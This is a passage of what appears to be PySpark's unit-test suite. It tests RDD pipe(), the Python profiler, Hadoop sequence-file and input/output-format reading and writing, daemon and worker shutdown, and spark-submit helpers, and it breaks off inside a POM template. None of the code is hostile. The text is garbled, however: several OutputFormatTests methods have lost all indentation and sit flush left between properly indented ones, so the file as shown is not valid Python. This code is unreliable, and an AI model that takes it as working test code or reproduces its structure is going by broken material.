    def test_pipe_functions(self):
        """pipe() surfaces subprocess failures per checkCode and passes data through."""
        data = ['1', '2', '3']
        rdd = self.sc.parallelize(data)
        with QuietTest(self.sc):
            # failing command: silent without checkCode, raises with it
            self.assertEqual([], rdd.pipe('cc').collect())
            self.assertRaises(Py4JJavaError, rdd.pipe('cc', checkCode=True).collect)
        result = rdd.pipe('cat').collect()
        result.sort()
        for x, y in zip(data, result):
            self.assertEqual(x, y)
        # grep exits non-zero when nothing matches
        self.assertRaises(Py4JJavaError, rdd.pipe('grep 4', checkCode=True).collect)
        self.assertEqual([], rdd.pipe('grep 4').collect())
class ProfilerTests(PySparkTestCase):
    """Tests for the Python-side profiler (spark.python.profile)."""
    def setUp(self):
        # Run with profiling enabled; parent tearDown is assumed to stop the
        # context and restore sys.path (saved here) — TODO confirm in base class.
        self._old_sys_path = list(sys.path)
        class_name = self.__class__.__name__
        conf = SparkConf().set("spark.python.profile", "true")
        self.sc = SparkContext('local[4]', class_name, conf=conf)
    def test_profiler(self):
        """The default profiler records stats, shows them, and dumps them to disk."""
        self.do_computation()
        profilers = self.sc.profiler_collector.profilers
        self.assertEqual(1, len(profilers))
        id, profiler, _ = profilers[0]
        stats = profiler.stats()
        self.assertTrue(stats is not None)
        width, stat_list = stats.get_print_list([])
        func_names = [func_name for fname, n, func_name in stat_list]
        self.assertTrue("heavy_foo" in func_names)
        # show_profiles() prints to stdout; capture it to check its content
        old_stdout = sys.stdout
        sys.stdout = io = StringIO()
        self.sc.show_profiles()
        self.assertTrue("heavy_foo" in io.getvalue())
        sys.stdout = old_stdout
        d = tempfile.gettempdir()
        self.sc.dump_profiles(d)
        self.assertTrue("rdd_%d.pstats" % id in os.listdir(d))
    def test_custom_profiler(self):
        """A custom profiler class replaces the default and its show() is used."""
        class TestCustomProfiler(BasicProfiler):
            def show(self, id):
                self.result = "Custom formatting"
        self.sc.profiler_collector.profiler_cls = TestCustomProfiler
        self.do_computation()
        profilers = self.sc.profiler_collector.profilers
        self.assertEqual(1, len(profilers))
        _, profiler, _ = profilers[0]
        self.assertTrue(isinstance(profiler, TestCustomProfiler))
        self.sc.show_profiles()
        self.assertEqual("Custom formatting", profiler.result)
    def do_computation(self):
        # Busy-loop task so the profiler has something to record.
        def heavy_foo(x):
            for i in range(1 << 18):
                x = 1
        rdd = self.sc.parallelize(range(100))
        rdd.foreach(heavy_foo)
class InputFormatTests(ReusedPySparkTestCase):
    """Reading Hadoop sequence files and input formats into Python RDDs.

    setUpClass generates the test data via the JVM-side
    WriteInputFormatTestDataGenerator into a fresh temp directory.
    """
    @classmethod
    def setUpClass(cls):
        ReusedPySparkTestCase.setUpClass()
        # Grab a unique path; the file itself is removed so only the name is
        # used as the data directory.
        cls.tempdir = tempfile.NamedTemporaryFile(delete=False)
        os.unlink(cls.tempdir.name)
        cls.sc._jvm.WriteInputFormatTestDataGenerator.generateData(cls.tempdir.name, cls.sc._jsc)
    @classmethod
    def tearDownClass(cls):
        ReusedPySparkTestCase.tearDownClass()
        shutil.rmtree(cls.tempdir.name)
    @unittest.skipIf(sys.version >= "3", "serialize array of byte")
    def test_sequencefiles(self):
        """sequenceFile() deserializes each writable type to the expected Python value."""
        basepath = self.tempdir.name
        ints = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfint/",
                                           "org.apache.hadoop.io.IntWritable",
                                           "org.apache.hadoop.io.Text").collect())
        ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
        self.assertEqual(ints, ei)
        doubles = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfdouble/",
                                              "org.apache.hadoop.io.DoubleWritable",
                                              "org.apache.hadoop.io.Text").collect())
        ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
        self.assertEqual(doubles, ed)
        # NOTE(review): `bytes` shadows the builtin name; left unchanged here.
        bytes = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbytes/",
                                            "org.apache.hadoop.io.IntWritable",
                                            "org.apache.hadoop.io.BytesWritable").collect())
        ebs = [(1, bytearray('aa', 'utf-8')),
               (1, bytearray('aa', 'utf-8')),
               (2, bytearray('aa', 'utf-8')),
               (2, bytearray('bb', 'utf-8')),
               (2, bytearray('bb', 'utf-8')),
               (3, bytearray('cc', 'utf-8'))]
        self.assertEqual(bytes, ebs)
        text = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sftext/",
                                           "org.apache.hadoop.io.Text",
                                           "org.apache.hadoop.io.Text").collect())
        et = [(u'1', u'aa'),
              (u'1', u'aa'),
              (u'2', u'aa'),
              (u'2', u'bb'),
              (u'2', u'bb'),
              (u'3', u'cc')]
        self.assertEqual(text, et)
        bools = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfbool/",
                                            "org.apache.hadoop.io.IntWritable",
                                            "org.apache.hadoop.io.BooleanWritable").collect())
        eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
        self.assertEqual(bools, eb)
        nulls = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfnull/",
                                            "org.apache.hadoop.io.IntWritable",
                                            "org.apache.hadoop.io.BooleanWritable").collect())
        en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
        self.assertEqual(nulls, en)
        maps = self.sc.sequenceFile(basepath + "/sftestdata/sfmap/",
                                    "org.apache.hadoop.io.IntWritable",
                                    "org.apache.hadoop.io.MapWritable").collect()
        em = [(1, {}),
              (1, {3.0: u'bb'}),
              (2, {1.0: u'aa'}),
              (2, {1.0: u'cc'}),
              (3, {2.0: u'dd'})]
        for v in maps:
            self.assertTrue(v in em)
        # arrays get pickled to tuples by default
        tuples = sorted(self.sc.sequenceFile(
            basepath + "/sftestdata/sfarray/",
            "org.apache.hadoop.io.IntWritable",
            "org.apache.spark.api.python.DoubleArrayWritable").collect())
        et = [(1, ()),
              (2, (3.0, 4.0, 5.0)),
              (3, (4.0, 5.0, 6.0))]
        self.assertEqual(tuples, et)
        # with custom converters, primitive arrays can stay as arrays
        arrays = sorted(self.sc.sequenceFile(
            basepath + "/sftestdata/sfarray/",
            "org.apache.hadoop.io.IntWritable",
            "org.apache.spark.api.python.DoubleArrayWritable",
            valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
        ea = [(1, array('d')),
              (2, array('d', [3.0, 4.0, 5.0])),
              (3, array('d', [4.0, 5.0, 6.0]))]
        self.assertEqual(arrays, ea)
        clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
                                            "org.apache.hadoop.io.Text",
                                            "org.apache.spark.api.python.TestWritable").collect())
        cname = u'org.apache.spark.api.python.TestWritable'
        ec = [(u'1', {u'__class__': cname, u'double': 1.0, u'int': 1, u'str': u'test1'}),
              (u'2', {u'__class__': cname, u'double': 2.3, u'int': 2, u'str': u'test2'}),
              (u'3', {u'__class__': cname, u'double': 3.1, u'int': 3, u'str': u'test3'}),
              (u'4', {u'__class__': cname, u'double': 4.2, u'int': 4, u'str': u'test4'}),
              (u'5', {u'__class__': cname, u'double': 5.5, u'int': 5, u'str': u'test56'})]
        self.assertEqual(clazz, ec)
        unbatched_clazz = sorted(self.sc.sequenceFile(basepath + "/sftestdata/sfclass/",
                                                      "org.apache.hadoop.io.Text",
                                                      "org.apache.spark.api.python.TestWritable",
                                                      ).collect())
        self.assertEqual(unbatched_clazz, ec)
    def test_oldhadoop(self):
        """hadoopFile/hadoopRDD (old mapred API) read sequence and text input."""
        basepath = self.tempdir.name
        ints = sorted(self.sc.hadoopFile(basepath + "/sftestdata/sfint/",
                                         "org.apache.hadoop.mapred.SequenceFileInputFormat",
                                         "org.apache.hadoop.io.IntWritable",
                                         "org.apache.hadoop.io.Text").collect())
        ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
        self.assertEqual(ints, ei)
        hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
        oldconf = {"mapred.input.dir": hellopath}
        hello = self.sc.hadoopRDD("org.apache.hadoop.mapred.TextInputFormat",
                                  "org.apache.hadoop.io.LongWritable",
                                  "org.apache.hadoop.io.Text",
                                  conf=oldconf).collect()
        result = [(0, u'Hello World!')]
        self.assertEqual(hello, result)
    def test_newhadoop(self):
        """newAPIHadoopFile/newAPIHadoopRDD (mapreduce API) read sequence and text input."""
        basepath = self.tempdir.name
        ints = sorted(self.sc.newAPIHadoopFile(
            basepath + "/sftestdata/sfint/",
            "org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
            "org.apache.hadoop.io.IntWritable",
            "org.apache.hadoop.io.Text").collect())
        ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
        self.assertEqual(ints, ei)
        hellopath = os.path.join(SPARK_HOME, "python/test_support/hello.txt")
        newconf = {"mapred.input.dir": hellopath}
        hello = self.sc.newAPIHadoopRDD("org.apache.hadoop.mapreduce.lib.input.TextInputFormat",
                                        "org.apache.hadoop.io.LongWritable",
                                        "org.apache.hadoop.io.Text",
                                        conf=newconf).collect()
        result = [(0, u'Hello World!')]
        self.assertEqual(hello, result)
    def test_newolderror(self):
        """Loading an input format through the wrong (old/new) API raises."""
        basepath = self.tempdir.name
        self.assertRaises(Exception, lambda: self.sc.hadoopFile(
            basepath + "/sftestdata/sfint/",
            "org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
            "org.apache.hadoop.io.IntWritable",
            "org.apache.hadoop.io.Text"))
        self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
            basepath + "/sftestdata/sfint/",
            "org.apache.hadoop.mapred.SequenceFileInputFormat",
            "org.apache.hadoop.io.IntWritable",
            "org.apache.hadoop.io.Text"))
    def test_bad_inputs(self):
        """Nonexistent writable or input-format class names raise."""
        basepath = self.tempdir.name
        self.assertRaises(Exception, lambda: self.sc.sequenceFile(
            basepath + "/sftestdata/sfint/",
            "org.apache.hadoop.io.NotValidWritable",
            "org.apache.hadoop.io.Text"))
        self.assertRaises(Exception, lambda: self.sc.hadoopFile(
            basepath + "/sftestdata/sfint/",
            "org.apache.hadoop.mapred.NotValidInputFormat",
            "org.apache.hadoop.io.IntWritable",
            "org.apache.hadoop.io.Text"))
        self.assertRaises(Exception, lambda: self.sc.newAPIHadoopFile(
            basepath + "/sftestdata/sfint/",
            "org.apache.hadoop.mapreduce.lib.input.NotValidInputFormat",
            "org.apache.hadoop.io.IntWritable",
            "org.apache.hadoop.io.Text"))
    def test_converters(self):
        """Custom key/value converters are applied when reading sequence files."""
        # use of custom converters
        basepath = self.tempdir.name
        maps = sorted(self.sc.sequenceFile(
            basepath + "/sftestdata/sfmap/",
            "org.apache.hadoop.io.IntWritable",
            "org.apache.hadoop.io.MapWritable",
            keyConverter="org.apache.spark.api.python.TestInputKeyConverter",
            valueConverter="org.apache.spark.api.python.TestInputValueConverter").collect())
        em = [(u'\x01', []),
              (u'\x01', [3.0]),
              (u'\x02', [1.0]),
              (u'\x02', [1.0]),
              (u'\x03', [2.0])]
        self.assertEqual(maps, em)
    def test_binary_files(self):
        """binaryFiles returns (path, raw bytes) pairs."""
        path = os.path.join(self.tempdir.name, "binaryfiles")
        os.mkdir(path)
        data = b"short binary data"
        with open(os.path.join(path, "part-0000"), 'wb') as f:
            f.write(data)
        [(p, d)] = self.sc.binaryFiles(path).collect()
        self.assertTrue(p.endswith("part-0000"))
        self.assertEqual(d, data)
    def test_binary_records(self):
        """binaryRecords splits a file into fixed-length records."""
        path = os.path.join(self.tempdir.name, "binaryrecords")
        os.mkdir(path)
        with open(os.path.join(path, "part-0000"), 'w') as f:
            for i in range(100):
                f.write('%04d' % i)
        result = self.sc.binaryRecords(path, 4).map(int).collect()
        self.assertEqual(list(range(100)), result)
class OutputFormatTests(ReusedPySparkTestCase):
    def setUp(self):
        # Grab a unique temp path; the file is removed immediately so only its
        # name is used, as an output directory by the tests.
        self.tempdir = tempfile.NamedTemporaryFile(delete=False)
        os.unlink(self.tempdir.name)
    def tearDown(self):
        # Output directories may or may not exist depending on which test ran.
        shutil.rmtree(self.tempdir.name, ignore_errors=True)
@unittest.skipIf(sys.version >= "3", "serialize array of byte")
def test_sequencefiles(self):
basepath = self.tempdir.name
ei = [(1, u'aa'), (1, u'aa'), (2, u'aa'), (2, u'bb'), (2, u'bb'), (3, u'cc')]
self.sc.parallelize(ei).saveAsSequenceFile(basepath + "/sfint/")
ints = sorted(self.sc.sequenceFile(basepath + "/sfint/").collect())
self.assertEqual(ints, ei)
ed = [(1.0, u'aa'), (1.0, u'aa'), (2.0, u'aa'), (2.0, u'bb'), (2.0, u'bb'), (3.0, u'cc')]
self.sc.parallelize(ed).saveAsSequenceFile(basepath + "/sfdouble/")
doubles = sorted(self.sc.sequenceFile(basepath + "/sfdouble/").collect())
self.assertEqual(doubles, ed)
ebs = [(1, bytearray(b'\x00\x07spam\x08')), (2, bytearray(b'\x00\x07spam\x08'))]
self.sc.parallelize(ebs).saveAsSequenceFile(basepath + "/sfbytes/")
bytes = sorted(self.sc.sequenceFile(basepath + "/sfbytes/").collect())
self.assertEqual(bytes, ebs)
et = [(u'1', u'aa'),
(u'2', u'bb'),
(u'3', u'cc')]
self.sc.parallelize(et).saveAsSequenceFile(basepath + "/sftext/")
text = sorted(self.sc.sequenceFile(basepath + "/sftext/").collect())
self.assertEqual(text, et)
eb = [(1, False), (1, True), (2, False), (2, False), (2, True), (3, True)]
self.sc.parallelize(eb).saveAsSequenceFile(basepath + "/sfbool/")
bools = sorted(self.sc.sequenceFile(basepath + "/sfbool/").collect())
self.assertEqual(bools, eb)
en = [(1, None), (1, None), (2, None), (2, None), (2, None), (3, None)]
self.sc.parallelize(en).saveAsSequenceFile(basepath + "/sfnull/")
nulls = sorted(self.sc.sequenceFile(basepath + "/sfnull/").collect())
self.assertEqual(nulls, en)
em = [(1, {}),
(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(2, {1.0: u'cc'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(em).saveAsSequenceFile(basepath + "/sfmap/")
maps = self.sc.sequenceFile(basepath + "/sfmap/").collect()
for v in maps:
self.assertTrue(v, em)
def test_oldhadoop(self):
basepath = self.tempdir.name
dict_data = [(1, {}),
(1, {"row1": 1.0}),
(2, {"row2": 2.0})]
self.sc.parallelize(dict_data).saveAsHadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable")
result = self.sc.hadoopFile(
basepath + "/oldhadoop/",
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable").collect()
for v in result:
self.assertTrue(v, dict_data)
conf = {
"mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.MapWritable",
"mapred.output.dir": basepath + "/olddataset/"
}
self.sc.parallelize(dict_data).saveAsHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/olddataset/"}
result = self.sc.hadoopRDD(
"org.apache.hadoop.mapred.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.MapWritable",
conf=input_conf).collect()
for v in result:
self.assertTrue(v, dict_data)
def test_newhadoop(self):
basepath = self.tempdir.name
data = [(1, ""),
(1, "a"),
(2, "bcdf")]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text")
result = sorted(self.sc.newAPIHadoopFile(
basepath + "/newhadoop/",
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text").collect())
self.assertEqual(result, data)
conf = {
"mapreduce.outputformat.class":
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
"mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
"mapred.output.value.class": "org.apache.hadoop.io.Text",
"mapred.output.dir": basepath + "/newdataset/"
}
self.sc.parallelize(data).saveAsNewAPIHadoopDataset(conf)
input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
new_dataset = sorted(self.sc.newAPIHadoopRDD(
"org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
"org.apache.hadoop.io.IntWritable",
"org.apache.hadoop.io.Text",
conf=input_conf).collect())
self.assertEqual(new_dataset, data)
    @unittest.skipIf(sys.version >= "3", "serialize of array")
    def test_newhadoop_with_array(self):
        """Round-trip array('d') values via custom DoubleArrayWritable converters."""
        basepath = self.tempdir.name
        # use custom ArrayWritable types and converters to handle arrays
        array_data = [(1, array('d')),
                      (1, array('d', [1.0, 2.0, 3.0])),
                      (2, array('d', [3.0, 4.0, 5.0]))]
        self.sc.parallelize(array_data).saveAsNewAPIHadoopFile(
            basepath + "/newhadoop/",
            "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
            "org.apache.hadoop.io.IntWritable",
            "org.apache.spark.api.python.DoubleArrayWritable",
            valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
        result = sorted(self.sc.newAPIHadoopFile(
            basepath + "/newhadoop/",
            "org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
            "org.apache.hadoop.io.IntWritable",
            "org.apache.spark.api.python.DoubleArrayWritable",
            valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter").collect())
        self.assertEqual(result, array_data)
        # Same round trip through the conf-driven dataset API.
        conf = {
            "mapreduce.outputformat.class":
                "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
            "mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
            "mapred.output.value.class": "org.apache.spark.api.python.DoubleArrayWritable",
            "mapred.output.dir": basepath + "/newdataset/"
        }
        self.sc.parallelize(array_data).saveAsNewAPIHadoopDataset(
            conf,
            valueConverter="org.apache.spark.api.python.DoubleArrayToWritableConverter")
        input_conf = {"mapred.input.dir": basepath + "/newdataset/"}
        new_dataset = sorted(self.sc.newAPIHadoopRDD(
            "org.apache.hadoop.mapreduce.lib.input.SequenceFileInputFormat",
            "org.apache.hadoop.io.IntWritable",
            "org.apache.spark.api.python.DoubleArrayWritable",
            valueConverter="org.apache.spark.api.python.WritableToDoubleArrayConverter",
            conf=input_conf).collect())
        self.assertEqual(new_dataset, array_data)
def test_newolderror(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/newolderror/saveAsHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/newolderror/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapred.SequenceFileOutputFormat"))
def test_bad_inputs(self):
basepath = self.tempdir.name
rdd = self.sc.parallelize(range(1, 4)).map(lambda x: (x, "a" * x))
self.assertRaises(Exception, lambda: rdd.saveAsHadoopFile(
basepath + "/badinputs/saveAsHadoopFile/",
"org.apache.hadoop.mapred.NotValidOutputFormat"))
self.assertRaises(Exception, lambda: rdd.saveAsNewAPIHadoopFile(
basepath + "/badinputs/saveAsNewAPIHadoopFile/",
"org.apache.hadoop.mapreduce.lib.output.NotValidOutputFormat"))
def test_converters(self):
# use of custom converters
basepath = self.tempdir.name
data = [(1, {3.0: u'bb'}),
(2, {1.0: u'aa'}),
(3, {2.0: u'dd'})]
self.sc.parallelize(data).saveAsNewAPIHadoopFile(
basepath + "/converters/",
"org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
keyConverter="org.apache.spark.api.python.TestOutputKeyConverter",
valueConverter="org.apache.spark.api.python.TestOutputValueConverter")
converted = sorted(self.sc.sequenceFile(basepath + "/converters/").collect())
expected = [(u'1', 3.0),
(u'2', 1.0),
(u'3', 2.0)]
self.assertEqual(converted, expected)
    def test_reserialization(self):
        """Data saved through any of the five save APIs must read back identically."""
        basepath = self.tempdir.name
        x = range(1, 5)
        y = range(1001, 1005)
        data = list(zip(x, y))
        rdd = self.sc.parallelize(x).zip(self.sc.parallelize(y))
        # 1) plain sequence file
        rdd.saveAsSequenceFile(basepath + "/reserialize/sequence")
        result1 = sorted(self.sc.sequenceFile(basepath + "/reserialize/sequence").collect())
        self.assertEqual(result1, data)
        # 2) old (mapred) API save
        rdd.saveAsHadoopFile(
            basepath + "/reserialize/hadoop",
            "org.apache.hadoop.mapred.SequenceFileOutputFormat")
        result2 = sorted(self.sc.sequenceFile(basepath + "/reserialize/hadoop").collect())
        self.assertEqual(result2, data)
        # 3) new (mapreduce) API save
        rdd.saveAsNewAPIHadoopFile(
            basepath + "/reserialize/newhadoop",
            "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat")
        result3 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newhadoop").collect())
        self.assertEqual(result3, data)
        # 4) old API, conf-driven dataset save
        conf4 = {
            "mapred.output.format.class": "org.apache.hadoop.mapred.SequenceFileOutputFormat",
            "mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
            "mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
            "mapred.output.dir": basepath + "/reserialize/dataset"}
        rdd.saveAsHadoopDataset(conf4)
        result4 = sorted(self.sc.sequenceFile(basepath + "/reserialize/dataset").collect())
        self.assertEqual(result4, data)
        # 5) new API, conf-driven dataset save
        conf5 = {"mapreduce.outputformat.class":
                 "org.apache.hadoop.mapreduce.lib.output.SequenceFileOutputFormat",
                 "mapred.output.key.class": "org.apache.hadoop.io.IntWritable",
                 "mapred.output.value.class": "org.apache.hadoop.io.IntWritable",
                 "mapred.output.dir": basepath + "/reserialize/newdataset"}
        rdd.saveAsNewAPIHadoopDataset(conf5)
        result5 = sorted(self.sc.sequenceFile(basepath + "/reserialize/newdataset").collect())
        self.assertEqual(result5, data)
def test_malformed_RDD(self):
basepath = self.tempdir.name
# non-batch-serialized RDD[[(K, V)]] should be rejected
data = [[(1, "a")], [(2, "aa")], [(3, "aaa")]]
rdd = self.sc.parallelize(data, len(data))
self.assertRaises(Exception, lambda: rdd.saveAsSequenceFile(
basepath + "/malformed/sequence"))
class DaemonTests(unittest.TestCase):
    """Verify that the PySpark daemon and its workers shut down on request."""

    def connect(self, port):
        """Open a TCP connection to the daemon and ask the worker to stop."""
        from socket import socket, AF_INET, SOCK_STREAM
        conn = socket(AF_INET, SOCK_STREAM)
        conn.connect(('127.0.0.1', port))
        # A split index of -1 (0xFFFFFFFF) tells the worker to shut down.
        conn.send(b"\xFF\xFF\xFF\xFF")
        conn.close()
        return True

    def do_termination_test(self, terminator):
        """Start a daemon, terminate it via `terminator`, and check it died."""
        from subprocess import Popen, PIPE
        from errno import ECONNREFUSED

        # Launch the daemon process.
        daemon_script = os.path.join(os.path.dirname(__file__), "daemon.py")
        interpreter = sys.executable or os.environ.get("PYSPARK_PYTHON")
        daemon = Popen([interpreter, daemon_script], stdin=PIPE, stdout=PIPE)

        # The daemon reports its listening port on stdout.
        port = read_int(daemon.stdout)

        # It should accept connections while alive.
        self.assertTrue(self.connect(port))

        # Bring the daemon down using the caller-supplied strategy.
        terminator(daemon)
        time.sleep(1)

        # Connections must now be refused.
        refused = False
        try:
            self.connect(port)
        except EnvironmentError as exception:
            self.assertEqual(exception.errno, ECONNREFUSED)
            refused = True
        if not refused:
            self.fail("Expected EnvironmentError to be raised")

    def test_termination_stdin(self):
        """Ensure that daemon and workers terminate when stdin is closed."""
        self.do_termination_test(lambda daemon: daemon.stdin.close())

    def test_termination_sigterm(self):
        """Ensure that daemon and workers terminate on SIGTERM."""
        from signal import SIGTERM
        self.do_termination_test(lambda daemon: os.kill(daemon.pid, SIGTERM))
class WorkerTests(ReusedPySparkTestCase):
    """Tests of the Python worker lifecycle: cancellation, reuse and recovery."""

    def test_cancel_task(self):
        """Cancelling a running job must kill the worker but leave the daemon alive."""
        temp = tempfile.NamedTemporaryFile(delete=True)
        temp.close()
        path = temp.name

        def sleep(x):
            import os
            import time
            # Record the daemon (parent) and worker pids, then block so the
            # task is still running when the job is cancelled.
            with open(path, 'w') as f:
                f.write("%d %d" % (os.getppid(), os.getpid()))
            time.sleep(100)

        # start job in background thread
        def run():
            try:
                self.sc.parallelize(range(1), 1).foreach(sleep)
            except Exception:
                pass
        import threading
        t = threading.Thread(target=run)
        t.daemon = True
        t.start()

        # Wait until the task has written its pids.
        daemon_pid, worker_pid = 0, 0
        while True:
            if os.path.exists(path):
                with open(path) as f:
                    data = f.read().split(' ')
                daemon_pid, worker_pid = map(int, data)
                break
            time.sleep(0.1)

        # cancel jobs
        self.sc.cancelAllJobs()
        t.join()

        # Poll with signal 0 (existence check) until the worker disappears.
        for _ in range(50):
            try:
                os.kill(worker_pid, 0)
                time.sleep(0.1)
            except OSError:
                break  # worker was killed
        else:
            self.fail("worker has not been killed after 5 seconds")

        # The daemon must survive the cancellation.
        try:
            os.kill(daemon_pid, 0)
        except OSError:
            self.fail("daemon had been killed")

        # run a normal job to confirm the context is still usable
        rdd = self.sc.parallelize(xrange(100), 1)
        self.assertEqual(100, rdd.map(str).count())

    def test_after_exception(self):
        """The worker must keep serving jobs after a Python task raised."""
        def raise_exception(_):
            raise Exception()
        rdd = self.sc.parallelize(xrange(100), 1)
        with QuietTest(self.sc):
            self.assertRaises(Exception, lambda: rdd.foreach(raise_exception))
        self.assertEqual(100, rdd.map(str).count())

    def test_after_jvm_exception(self):
        """The worker must keep serving jobs after a JVM-side failure."""
        tempFile = tempfile.NamedTemporaryFile(delete=False)
        tempFile.write(b"Hello World!")
        tempFile.close()
        data = self.sc.textFile(tempFile.name, 1)
        filtered_data = data.filter(lambda x: True)
        self.assertEqual(1, filtered_data.count())
        # Deleting the input file makes the next action fail inside the JVM.
        os.unlink(tempFile.name)
        with QuietTest(self.sc):
            self.assertRaises(Exception, lambda: filtered_data.count())
        rdd = self.sc.parallelize(xrange(100), 1)
        self.assertEqual(100, rdd.map(str).count())

    def test_accumulator_when_reuse_worker(self):
        """Accumulators must not leak state between jobs on reused workers."""
        from pyspark.accumulators import INT_ACCUMULATOR_PARAM
        acc1 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
        self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc1.add(x))
        self.assertEqual(sum(range(100)), acc1.value)

        acc2 = self.sc.accumulator(0, INT_ACCUMULATOR_PARAM)
        self.sc.parallelize(xrange(100), 20).foreach(lambda x: acc2.add(x))
        self.assertEqual(sum(range(100)), acc2.value)
        self.assertEqual(sum(range(100)), acc1.value)

    def test_reuse_worker_after_take(self):
        """A worker interrupted by take()/first() must be reusable afterwards."""
        rdd = self.sc.parallelize(xrange(100000), 1)
        self.assertEqual(0, rdd.first())

        def count():
            try:
                rdd.count()
            except Exception:
                pass

        t = threading.Thread(target=count)
        t.daemon = True
        t.start()
        t.join(5)
        # BUG FIX: Thread.isAlive() was removed in Python 3.9; use is_alive().
        self.assertTrue(not t.is_alive())
        self.assertEqual(100000, rdd.count())

    def test_with_different_versions_of_python(self):
        """A driver/worker Python version mismatch must raise a Py4J error."""
        rdd = self.sc.parallelize(range(10))
        rdd.count()
        version = self.sc.pythonVer
        self.sc.pythonVer = "2.0"
        try:
            with QuietTest(self.sc):
                self.assertRaises(Py4JJavaError, lambda: rdd.count())
        finally:
            # Always restore the real version so later tests are unaffected.
            self.sc.pythonVer = version
class SparkSubmitTests(unittest.TestCase):
    """End-to-end tests that launch small programs through bin/spark-submit."""
    def setUp(self):
        """Create a scratch directory and locate spark-submit under $SPARK_HOME."""
        self.programDir = tempfile.mkdtemp()
        self.sparkSubmit = os.path.join(os.environ.get("SPARK_HOME"), "bin", "spark-submit")
    def tearDown(self):
        """Delete the scratch directory and all scripts/archives created in it."""
        shutil.rmtree(self.programDir)
    def createTempFile(self, name, content, dir=None):
        """
        Create a temp file with the given name and content and return its path.
        Strips leading spaces from content up to the first '|' in each line.
        """
        pattern = re.compile(r'^ *\|', re.MULTILINE)
        content = re.sub(pattern, '', content.strip())
        if dir is None:
            path = os.path.join(self.programDir, name)
        else:
            os.makedirs(os.path.join(self.programDir, dir))
            path = os.path.join(self.programDir, dir, name)
        with open(path, "w") as f:
            f.write(content)
        return path
    def createFileInZip(self, name, content, ext=".zip", dir=None, zip_name=None):
        """
        Create a zip archive containing a file with the given content and return its path.
        Strips leading spaces from content up to the first '|' in each line.
        """
        pattern = re.compile(r'^ *\|', re.MULTILINE)
        content = re.sub(pattern, '', content.strip())
        if dir is None:
            path = os.path.join(self.programDir, name + ext)
        else:
            path = os.path.join(self.programDir, dir, zip_name + ext)
        zip = zipfile.ZipFile(path, 'w')
        zip.writestr(name, content)
        zip.close()
        return path
    def create_spark_package(self, artifact_name):
        """Build a minimal Spark Package (pom + .py inside a jar) in a local
        Maven repository layout under programDir."""
        group_id, artifact_id, version = artifact_name.split(":")
        self.createTempFile("%s-%s.pom" % (artifact_id, version), ("""
            |<?xml version="1.0" encoding="UTF-8"?>
            |<project xmlns="http://maven.apache.org/POM/4.0.0"
            |   xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
            |   xsi:schemaLocation="http://maven.apache.org/POM/4.0.0
            |   http://maven.apache.org/xsd/maven-4.0.0.xsd">
            |   <modelVersion>4.0.0</modelVersion>
